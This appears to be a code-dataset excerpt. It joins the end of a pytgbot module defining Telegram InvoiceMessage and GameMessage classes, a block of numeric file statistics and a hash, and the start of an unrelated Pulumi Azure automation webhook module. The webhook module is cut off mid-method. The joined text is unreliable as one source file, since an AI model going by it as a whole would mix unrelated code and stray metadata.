:param prices: Price breakdown, a JSON-serialized list of components (e.g. product price, tax, discount, delivery cost, delivery tax, bonus, etc.)
:type prices: list of pytgbot.api_types.sendable.payments.LabeledPrice
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param max_tip_amount: The maximum accepted amount for tips in the smallest units of the currency (integer, not float/double). For example, for a maximum tip of US$ 1.45 pass max_tip_amount = 145. See the exp parameter in currencies.json, it shows the number of digits past the decimal point for each currency (2 for the majority of currencies). Defaults to 0
:type max_tip_amount: int
:param suggested_tip_amounts: A JSON-serialized array of suggested amounts of tips in the smallest units of the currency (integer, not float/double). At most 4 suggested tip amounts can be specified. The suggested tip amounts must be positive, passed in a strictly increased order and must not exceed max_tip_amount.
:type suggested_tip_amounts: list of int
:param start_parameter: Unique deep-linking parameter. If left empty, forwarded copies of the sent message will have a Pay button, allowing multiple users to pay directly from the forwarded message, using the same invoice. If non-empty, forwarded copies of the sent message will have a URL button with a deep link to the bot (instead of a Pay button), with the value used as the start parameter
:type start_parameter: str|unicode
:param provider_data: A JSON-serialized data about the invoice, which will be shared with the payment provider. A detailed description of required fields should be provided by the payment provider.
:type provider_data: str|unicode
:param photo_url: URL of the product photo for the invoice. Can be a photo of the goods or a marketing image for a service. People like it better when they see what they are paying for.
:type photo_url: str|unicode
:param photo_size: Photo size
:type photo_size: int
:param photo_width: Photo width
:type photo_width: int
:param photo_height: Photo height
:type photo_height: int
:param need_name: Pass True, if you require the user's full name to complete the order
:type need_name: bool
:param need_phone_number: Pass True, if you require the user's phone number to complete the order
:type need_phone_number: bool
:param need_email: Pass True, if you require the user's email address to complete the order
:type need_email: bool
:param need_shipping_address: Pass True, if you require the user's shipping address to complete the order
:type need_shipping_address: bool
:param send_phone_number_to_provider: Pass True, if user's phone number should be sent to provider
:type send_phone_number_to_provider: bool
:param send_email_to_provider: Pass True, if user's email address should be sent to provider
:type send_email_to_provider: bool
:param is_flexible: Pass True, if the final price depends on the shipping method
:type is_flexible: bool
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: A JSON-serialized object for an inline keyboard. If empty, one 'Pay total price' button will be shown. If not empty, the first button must be a Pay button.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup
"""
super(InvoiceMessage, self).__init__()
from pytgbot.api_types.sendable.payments import LabeledPrice
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
assert_type_or_raise(title, unicode_type, parameter_name="title")
self.title = title
assert_type_or_raise(description, unicode_type, parameter_name="description")
self.description = description
assert_type_or_raise(payload, unicode_type, parameter_name="payload")
self.payload = payload
assert_type_or_raise(provider_token, unicode_type, parameter_name="provider_token")
self.provider_token = provider_token
assert_type_or_raise(currency, unicode_type, parameter_name="currency")
self.currency = currency
assert_type_or_raise(prices, list, parameter_name="prices")
self.prices = prices
assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
self.receiver = receiver
assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
self.reply_id = reply_id
assert_type_or_raise(max_tip_amount, None, int, parameter_name="max_tip_amount")
self.max_tip_amount = max_tip_amount
assert_type_or_raise(suggested_tip_amounts, None, list, parameter_name="suggested_tip_amounts")
self.suggested_tip_amounts = suggested_tip_amounts
assert_type_or_raise(start_parameter, None, unicode_type, parameter_name="start_parameter")
self.start_parameter = start_parameter
assert_type_or_raise(provider_data, None, unicode_type, parameter_name="provider_data")
self.provider_data = provider_data
assert_type_or_raise(photo_url, None, unicode_type, parameter_name="photo_url")
self.photo_url = photo_url
assert_type_or_raise(photo_size, None, int, parameter_name="photo_size")
self.photo_size = photo_size
assert_type_or_raise(photo_width, None, int, parameter_name="photo_width")
self.photo_width = photo_width
assert_type_or_raise(photo_height, None, int, parameter_name="photo_height")
self.photo_height = photo_height
assert_type_or_raise(need_name, None, bool, parameter_name="need_name")
self.need_name = need_name
assert_type_or_raise(need_phone_number, None, bool, parameter_name="need_phone_number")
self.need_phone_number = need_phone_number
assert_type_or_raise(need_email, None, bool, parameter_name="need_email")
self.need_email = need_email
assert_type_or_raise(need_shipping_address, None, bool, parameter_name="need_shipping_address")
self.need_shipping_address = need_shipping_address
assert_type_or_raise(send_phone_number_to_provider, None, bool, parameter_name="send_phone_number_to_provider")
self.send_phone_number_to_provider = send_phone_number_to_provider
assert_type_or_raise(send_email_to_provider, None, bool, parameter_name="send_email_to_provider")
self.send_email_to_provider = send_email_to_provider
assert_type_or_raise(is_flexible, None, bool, parameter_name="is_flexible")
self.is_flexible = is_flexible
assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
self.disable_notification = disable_notification
assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
self.allow_sending_without_reply = allow_sending_without_reply
assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, parameter_name="reply_markup")
self.reply_markup = reply_markup
# custom variable for message chaining
self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
"""
Send the message via pytgbot.
:param sender: The bot instance to send with.
:type sender: pytgbot.bot.Bot
:param ignore_reply: If we should not include the the `reply_to` parameter, because that already failed.
:type ignore_reply: bool
:rtype: PytgbotApiMessage
"""
return sender.send_invoice(
title=self.title,
description=self.description,
payload=self.payload,
provider_token=self.provider_token,
currency=self.currency,
prices=self.prices,
chat_id=self.receiver,
reply_to_message_id=self.reply_id,
max_tip_amount=self.max_tip_amount,
suggested_tip_amounts=self.suggested_tip_amounts,
start_parameter=self.start_parameter,
provider_data=self.provider_data,
photo_url=self.photo_url,
photo_size=self.photo_size,
photo_width=self.photo_width,
photo_height=self.photo_height,
need_name=self.need_name,
need_phone_number=self.need_phone_number,
need_email=self.need_email,
need_shipping_address=self.need_shipping_address,
send_phone_number_to_provider=self.send_phone_number_to_provider,
send_email_to_provider=self.send_email_to_provider,
is_flexible=self.is_flexible,
disable_notification=self.disable_notification,
allow_sending_without_reply=self.allow_sending_without_reply,
reply_markup=self.reply_markup,
)
# end def send
def to_array(self):
"""
Serializes this InvoiceMessage to a dictionary.
:return: dictionary representation of this object.
:rtype: dict
"""
from pytgbot.api_types.sendable.payments import LabeledPrice
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
array = super(InvoiceMessage, self).to_array()
array['title'] = u(self.title) # py2: type unicode, py3: type str
array['description'] = u(self.description) # py2: type unicode, py3: type str
array['payload'] = u(self.payload) # py2: type unicode, py3: type str
array['provider_token'] = u(self.provider_token) # py2: type unicode, py3: type str
array['currency'] = u(self.currency) # py2: type unicode, py3: type str
array['prices'] = PytgbotApiBot._as_array(self.prices) # type list of LabeledPrice
if isinstance(self.receiver, str):
array['chat_id'] = u(self.receiver) # py2: type unicode, py3: type str
elif isinstance(self.receiver, int):
array['chat_id'] = int(self.receiver) # type int
else:
raise TypeError('Unknown type, must be one of str, int.')
# end if
if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id) # type DEFAULT_MESSAGE_ID
elif isinstance(self.reply_id, int):
array['reply_to_message_id'] = int(self.reply_id) # type int
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
# end if
array['max_tip_amount'] = int(self.max_tip_amount) # type int
array['suggested_tip_amounts'] = PytgbotApiBot._as_array(self.suggested_tip_amounts) # type list of int
array['start_parameter'] = u(self.start_parameter) # py2: type unicode, py3: type str
array['provider_data'] = u(self.provider_data) # py2: type unicode, py3: type str
array['photo_url'] = u(self.photo_url) # py2: type unicode, py3: type str
array['photo_size'] = int(self.photo_size) # type int
array['photo_width'] = int(self.photo_width) # type int
array['photo_height'] = int(self.photo_height) # type int
array['need_name'] = bool(self.need_name) # type bool
array['need_phone_number'] = bool(self.need_phone_number) # type bool
array['need_email'] = bool(self.need_email) # type bool
array['need_shipping_address'] = bool(self.need_shipping_address) # type bool
array['send_phone_number_to_provider'] = bool(self.send_phone_number_to_provider) # type bool
array['send_email_to_provider'] = bool(self.send_email_to_provider) # type bool
array['is_flexible'] = bool(self.is_flexible) # type bool
array['disable_notification'] = bool(self.disable_notification) # type bool
array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply) # type bool
array['reply_markup'] = self.reply_markup.to_array() # type InlineKeyboardMarkup
return array
# end def to_array
@staticmethod
def validate_array(array):
"""
Builds a new array with valid values for the InvoiceMessage constructor.
:return: new array with valid values
:rtype: dict
"""
assert_type_or_raise(array, dict, parameter_name="array")
from pytgbot.api_types.sendable.payments import LabeledPrice
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
data = super(InvoiceMessage, InvoiceMessage).validate_array(array)
data['title'] = u(array.get('title'))
data['description'] = u(array.get('description'))
data['payload'] = u(array.get('payload'))
data['provider_token'] = u(array.get('provider_token'))
data['currency'] = u(array.get('currency'))
data['prices'] = LabeledPrice.from_array_list(array.get('prices'), list_level=1)
if array.get('chat_id') is None:
data['receiver'] = None
elif isinstance(array.get('chat_id'), str):
data['receiver'] = u(array.get('chat_id'))
elif isinstance(array.get('chat_id'), int):
data['receiver'] = int(array.get('chat_id'))
else:
raise TypeError('Unknown type, must be one of str, int or None.')
# end if
if array.get('reply_to_message_id') is None:
data['reply_id'] = None
elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
data['reply_id'] = DEFAULT_MESSAGE_ID
elif isinstance(array.get('reply_to_message_id'), int):
data['reply_id'] = int(array.get('reply_to_message_id'))
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
# end if
data['max_tip_amount'] = int(array.get('max_tip_amount')) if array.get('max_tip_amount') is not None else None
data['suggested_tip_amounts'] = TgBotApiObject._builtin_from_array_list(required_type=int, value=array.get('suggested_tip_amounts'), list_level=1) if array.get('suggested_tip_amounts') is not None else None
data['start_parameter'] = u(array.get('start_parameter')) if array.get('start_parameter') is not None else None
data['provider_data'] = u(array.get('provider_data')) if array.get('provider_data') is not None else None
data['photo_url'] = u(array.get('photo_url')) if array.get('photo_url') is not None else None
data['photo_size'] = int(array.get('photo_size')) if array.get('photo_size') is not None else None
data['photo_width'] = int(array.get('photo_width')) if array.get('photo_width') is not None else None
data['photo_height'] = int(array.get('photo_height')) if array.get('photo_height') is not None else None
data['need_name'] = bool(array.get('need_name')) if array.get('need_name') is not None else None
data['need_phone_number'] = bool(array.get('need_phone_number')) if array.get('need_phone_number') is not None else None
data['need_email'] = bool(array.get('need_email')) if array.get('need_email') is not None else None
data['need_shipping_address'] = bool(array.get('need_shipping_address')) if array.get('need_shipping_address') is not None else None
data['send_phone_number_to_provider'] = bool(array.get('send_phone_number_to_provider')) if array.get('send_phone_number_to_provider') is not None else None
data['send_email_to_provider'] = bool(array.get('send_email_to_provider')) if array.get('send_email_to_provider') is not None else None
data['is_flexible'] = bool(array.get('is_flexible')) if array.get('is_flexible') is not None else None
data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup')) if array.get('reply_markup') is not None else None
return data
# end def validate_array
@staticmethod
def from_array(array):
"""
Deserialize a new InvoiceMessage from a given dictionary.
:return: new InvoiceMessage instance.
:rtype: InvoiceMessage
"""
if not array: # None or {}
return None
# end if
data = InvoiceMessage.validate_array(array)
return InvoiceMessage(**data)
# end def from_array
def __str__(self):
"""
Implements `str(invoicemessage_instance)`
"""
return "InvoiceMessage(title={self.title!r}, description={self.description!r}, payload={self.payload!r}, provider_token={self.provider_token!r}, currency={self.currency!r}, prices={self.prices!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, max_tip_amount={self.max_tip_amount!r}, suggested_tip_amounts={self.suggested_tip_amounts!r}, start_parameter={self.start_parameter!r}, provider_data={self.provider_data!r}, photo_url={self.photo_url!r}, photo_size={self.photo_size!r}, photo_width={self.photo_width!r}, photo_height={self.photo_height!r}, need_name={self.need_name!r}, need_phone_number={self.need_phone_number!r}, need_email={self.need_email!r}, need_shipping_address={self.need_shipping_address!r}, send_phone_number_to_provider={self.send_phone_number_to_provider!r}, send_email_to_provider={self.send_email_to_provider!r}, is_flexible={self.is_flexible!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __str__
def __repr__(self):
"""
Implements `repr(invoicemessage_instance)`
"""
return "InvoiceMessage(title={self.title!r}, description={self.description!r}, payload={self.payload!r}, provider_token={self.provider_token!r}, currency={self.currency!r}, prices={self.prices!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, max_tip_amount={self.max_tip_amount!r}, suggested_tip_amounts={self.suggested_tip_amounts!r}, start_parameter={self.start_parameter!r}, provider_data={self.provider_data!r}, photo_url={self.photo_url!r}, photo_size={self.photo_size!r}, photo_width={self.photo_width!r}, photo_height={self.photo_height!r}, need_name={self.need_name!r}, need_phone_number={self.need_phone_number!r}, need_email={self.need_email!r}, need_shipping_address={self.need_shipping_address!r}, send_phone_number_to_provider={self.send_phone_number_to_provider!r}, send_email_to_provider={self.send_email_to_provider!r}, is_flexible={self.is_flexible!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __repr__
def __contains__(self, key):
"""
Implements `"key" in invoicemessage_instance`
"""
return (
key in ["title", "description", "payload", "provider_token", "currency", "prices", "receiver", "reply_id", "max_tip_amount", "suggested_tip_amounts", "start_parameter", "provider_data", "photo_url", "photo_size", "photo_width", "photo_height", "need_name", "need_phone_number", "need_email", "need_shipping_address", "send_phone_number_to_provider", "send_email_to_provider", "is_flexible", "disable_notification", "allow_sending_without_reply", "reply_markup"]
and hasattr(self, key)
and bool(getattr(self, key, None))
)
# end def __contains__
# end class InvoiceMessage
class GameMessage(ReturnableMessageBase):
"""
Use this method to send a game. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendgame
Parameters:
:param game_short_name: Short name of the game, serves as the unique identifier for the game. Set up your games via Botfather.
:type game_short_name: str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: A JSON-serialized object for an inline keyboard. If empty, one 'Play game_title' button will be shown. If not empty, the first button must launch the game.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup
"""
def __init__(self, game_short_name, receiver=None, reply_id=DEFAULT_MESSAGE_ID, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
"""
Use this method to send a game. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendgame
Parameters:
:param game_short_name: Short name of the game, serves as the unique identifier for the game. Set up your games via Botfather.
:type game_short_name: str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: A JSON-serialized object for an inline keyboard. If empty, one 'Play game_title' button will be shown. If not empty, the first button must launch the game.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup
"""
super(GameMessage, self).__init__()
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
assert_type_or_raise(game_short_name, unicode_type, parameter_name="game_short_name")
self.game_short_name = game_short_name
assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
self.receiver = receiver
assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
self.reply_id = reply_id
assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
self.disable_notification = disable_notification
assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
self.allow_sending_without_reply = allow_sending_without_reply
assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, parameter_name="reply_markup")
self.reply_markup = reply_markup
# custom variable for message chaining
self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
"""
Send the message via pytgbot.
:param sender: The bot instance to send with.
:type sender: pytgbot.bot.Bot
:param ignore_reply: If we should not include the the `reply_to` parameter, because that already failed.
:type ignore_reply: bool
:rtype: PytgbotApiMessage
"""
return sender.send_game(
game_short_name=self.game_short_name,
chat_id=self.receiver,
reply_to_message_id=self.reply_id,
disable_notification=self.disable_notification,
allow_sending_without_reply=self.allow_sending_without_reply,
reply_markup=self.reply_markup,
)
# end def send
def to_array(self):
"""
Serializes this GameMessage to a dictionary.
:return: dictionary representation of this object.
:rtype: dict
"""
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
array = super(GameMessage, self).to_array()
array['game_short_name'] = u(self.game_short_name) # py2: type unicode, py3: type str
if isinstance(self.receiver, str):
array['chat_id'] = u(self.receiver) # py2: type unicode, py3: type str
elif isinstance(self.receiver, int):
array['chat_id'] = int(self.receiver) # type int
else:
raise TypeError('Unknown type, must be one of str, int.')
# end if
if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id) # type DEFAULT_MESSAGE_ID
elif isinstance(self.reply_id, int):
array['reply_to_message_id'] = int(self.reply_id) # type int
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
# end if
array['disable_notification'] = bool(self.disable_notification) # type bool
array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply) # type bool
array['reply_markup'] = self.reply_markup.to_array() # type InlineKeyboardMarkup
return array
# end def to_array
@staticmethod
def validate_array(array):
"""
Builds a new array with valid values for the GameMessage constructor.
:return: new array with valid values
:rtype: dict
"""
assert_type_or_raise(array, dict, parameter_name="array")
from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
data = super(GameMessage, GameMessage).validate_array(array)
data['game_short_name'] = u(array.get('game_short_name'))
if array.get('chat_id') is None:
data['receiver'] = None
elif isinstance(array.get('chat_id'), str):
data['receiver'] = u(array.get('chat_id'))
elif isinstance(array.get('chat_id'), int):
data['receiver'] = int(array.get('chat_id'))
else:
raise TypeError('Unknown type, must be one of str, int or None.')
# end if
if array.get('reply_to_message_id') is None:
data['reply_id'] = None
elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
data['reply_id'] = DEFAULT_MESSAGE_ID
elif isinstance(array.get('reply_to_message_id'), int):
data['reply_id'] = int(array.get('reply_to_message_id'))
else:
raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
# end if
data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup')) if array.get('reply_markup') is not None else None
return data
# end def validate_array
@staticmethod
def from_array(array):
"""
Deserialize a new GameMessage from a given dictionary.
:return: new GameMessage instance.
:rtype: GameMessage
"""
if not array: # None or {}
return None
# end if
data = GameMessage.validate_array(array)
return GameMessage(**data)
# end def from_array
def __str__(self):
"""
Implements `str(gamemessage_instance)`
"""
return "GameMessage(game_short_name={self.game_short_name!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __str__
def __repr__(self):
"""
Implements `repr(gamemessage_instance)`
"""
return "GameMessage(game_short_name={self.game_short_name!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
# end def __repr__
def __contains__(self, key):
"""
Implements `"key" in gamemessage_instance`
"""
return (
key in ["game_short_name", "receiver", "reply_id", "disable_notification", "allow_sending_without_reply", "reply_markup"]
and hasattr(self, key)
and bool(getattr(self, key, None))
)
# end def __contains__
# end class GameMessage
| 53.892211
| 1,061
| 0.704307
| 39,113
| 300,988
| 5.21645
| 0.017155
| 0.0496
| 0.029922
| 0.041146
| 0.928927
| 0.910195
| 0.896663
| 0.882797
| 0.878126
| 0.874534
| 0
| 0.002299
| 0.20943
| 300,988
| 5,584
| 1,062
| 53.901862
| 0.854904
| 0.367898
| 0
| 0.769494
| 0
| 0.012933
| 0.234932
| 0.104999
| 0
| 0
| 0
| 0
| 0.079118
| 1
| 0.056295
| false
| 0.00038
| 0.093191
| 0.00038
| 0.213009
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
3671dd9abeafb39ea161aae24d56cb50456c2cf4
| 28,850
|
py
|
Python
|
sdk/python/pulumi_azure/automation/webhook.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 109
|
2018-06-18T00:19:44.000Z
|
2022-02-20T05:32:57.000Z
|
sdk/python/pulumi_azure/automation/webhook.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 663
|
2018-06-18T21:08:46.000Z
|
2022-03-31T20:10:11.000Z
|
sdk/python/pulumi_azure/automation/webhook.py
|
henriktao/pulumi-azure
|
f1cbcf100b42b916da36d8fe28be3a159abaf022
|
[
"ECL-2.0",
"Apache-2.0"
] | 41
|
2018-07-19T22:37:38.000Z
|
2022-03-14T10:56:26.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['WebhookArgs', 'Webhook']
@pulumi.input_type
class WebhookArgs:
def __init__(__self__, *,
automation_account_name: pulumi.Input[str],
expiry_time: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
runbook_name: pulumi.Input[str],
enabled: Optional[pulumi.Input[bool]] = None,
name: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
run_on_worker_group: Optional[pulumi.Input[str]] = None,
uri: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Webhook resource.
:param pulumi.Input[str] automation_account_name: The name of the automation account in which the Webhook is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] expiry_time: Timestamp when the webhook expires. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Webhook is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] runbook_name: Name of the Automation Runbook to execute by Webhook.
:param pulumi.Input[bool] enabled: Controls if Webhook is enabled. Defaults to `true`.
:param pulumi.Input[str] name: Specifies the name of the Webhook. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Map of input parameters passed to runbook.
:param pulumi.Input[str] run_on_worker_group: Name of the hybrid worker group the Webhook job will run on.
:param pulumi.Input[str] uri: URI to initiate the webhook. Can be generated using [Generate URI API](https://docs.microsoft.com/en-us/rest/api/automation/webhook/generate-uri). By default, new URI is generated on each new resource creation.
"""
pulumi.set(__self__, "automation_account_name", automation_account_name)
pulumi.set(__self__, "expiry_time", expiry_time)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "runbook_name", runbook_name)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if name is not None:
pulumi.set(__self__, "name", name)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if run_on_worker_group is not None:
pulumi.set(__self__, "run_on_worker_group", run_on_worker_group)
if uri is not None:
pulumi.set(__self__, "uri", uri)
@property
@pulumi.getter(name="automationAccountName")
def automation_account_name(self) -> pulumi.Input[str]:
"""
The name of the automation account in which the Webhook is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "automation_account_name")
@automation_account_name.setter
def automation_account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "automation_account_name", value)
@property
@pulumi.getter(name="expiryTime")
def expiry_time(self) -> pulumi.Input[str]:
"""
Timestamp when the webhook expires. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "expiry_time")
@expiry_time.setter
def expiry_time(self, value: pulumi.Input[str]):
pulumi.set(self, "expiry_time", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group in which the Webhook is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="runbookName")
def runbook_name(self) -> pulumi.Input[str]:
"""
Name of the Automation Runbook to execute by Webhook.
"""
return pulumi.get(self, "runbook_name")
@runbook_name.setter
def runbook_name(self, value: pulumi.Input[str]):
pulumi.set(self, "runbook_name", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Controls if Webhook is enabled. Defaults to `true`.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Webhook. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Map of input parameters passed to runbook.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="runOnWorkerGroup")
def run_on_worker_group(self) -> Optional[pulumi.Input[str]]:
"""
Name of the hybrid worker group the Webhook job will run on.
"""
return pulumi.get(self, "run_on_worker_group")
@run_on_worker_group.setter
def run_on_worker_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "run_on_worker_group", value)
@property
@pulumi.getter
def uri(self) -> Optional[pulumi.Input[str]]:
"""
URI to initiate the webhook. Can be generated using [Generate URI API](https://docs.microsoft.com/en-us/rest/api/automation/webhook/generate-uri). By default, new URI is generated on each new resource creation.
"""
return pulumi.get(self, "uri")
@uri.setter
def uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "uri", value)
@pulumi.input_type
class _WebhookState:
def __init__(__self__, *,
automation_account_name: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
expiry_time: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
run_on_worker_group: Optional[pulumi.Input[str]] = None,
runbook_name: Optional[pulumi.Input[str]] = None,
uri: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Webhook resources.
:param pulumi.Input[str] automation_account_name: The name of the automation account in which the Webhook is created. Changing this forces a new resource to be created.
:param pulumi.Input[bool] enabled: Controls if Webhook is enabled. Defaults to `true`.
:param pulumi.Input[str] expiry_time: Timestamp when the webhook expires. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Webhook. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Map of input parameters passed to runbook.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Webhook is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] run_on_worker_group: Name of the hybrid worker group the Webhook job will run on.
:param pulumi.Input[str] runbook_name: Name of the Automation Runbook to execute by Webhook.
:param pulumi.Input[str] uri: URI to initiate the webhook. Can be generated using [Generate URI API](https://docs.microsoft.com/en-us/rest/api/automation/webhook/generate-uri). By default, new URI is generated on each new resource creation.
"""
if automation_account_name is not None:
pulumi.set(__self__, "automation_account_name", automation_account_name)
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
if expiry_time is not None:
pulumi.set(__self__, "expiry_time", expiry_time)
if name is not None:
pulumi.set(__self__, "name", name)
if parameters is not None:
